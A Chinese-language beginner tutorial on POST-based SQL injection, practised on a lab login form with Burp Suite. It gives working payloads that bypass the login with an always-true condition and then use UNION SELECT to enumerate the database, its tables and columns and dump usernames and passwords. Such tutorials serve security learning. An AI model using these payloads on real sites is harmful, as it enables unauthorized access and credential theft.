从零开始学渗透--SQL注入(四)

本文仅提供思路学习参考

POST注入

在我们普通的上网生活中,登录页是我们经常打交道的一个网页,而其原理一般都是通过POST方法将我们的账号密码整体作为一个表单发送给后端数据库经校验后,用户登录。它其实只是数据提交型式的不同,使用的方法都是基于前面的Union,报错,时间等等注入方式。是一个不错的复习机会。一般配合着抓包工具使用,这里推荐burpsuite

靶场实战

从零开始学渗透--SQL注入(四)_第1张图片

任意输入username password 点击submit提交表单信息。
(接下来都是在抓包工具中对参数进行修改)

在username处需要构造恒真语句
uname=a or 1=1--+&passwd=1&submit=Submit 返回页面出错,说明不是数字型
uname=a' or 1=1--+&passwd=1&submit=Submit 返回页面,登录成功
uname=a' or 1=2--+&passwd=1&submit=Submit 返回页面出错,登录失败

从零开始学渗透--SQL注入(四)_第2张图片

存在回显的话,那就可以用union查询来获取我们需要的信息了。

1.先查看数据库版本和数据库名
uname=a' union select database(),version()--+

从零开始学渗透--SQL注入(四)_第3张图片

2.查看表名

uname=a' union select1,group_concat(table_name) from information_schema.tables where table_schema =database()--+

从零开始学渗透--SQL注入(四)_第4张图片

3.获取列名

uname=a' union select 1,group_concat(column_name) from information_schema.columns where table_name ='users'--+

image.png

4.获取具体信息

uname=a' union select 1,group_concat(username,password) from users--+

image.png

至此,我们想要获取的信息都获取到了,POST注入主要是配合抓包工具来进行更改参数,本质还是用着前几种方法!继续加油

参考链接
https://blog.csdn.net/qq_4126...
https://portswigger.net/burp

你可能感兴趣的:(安全sql)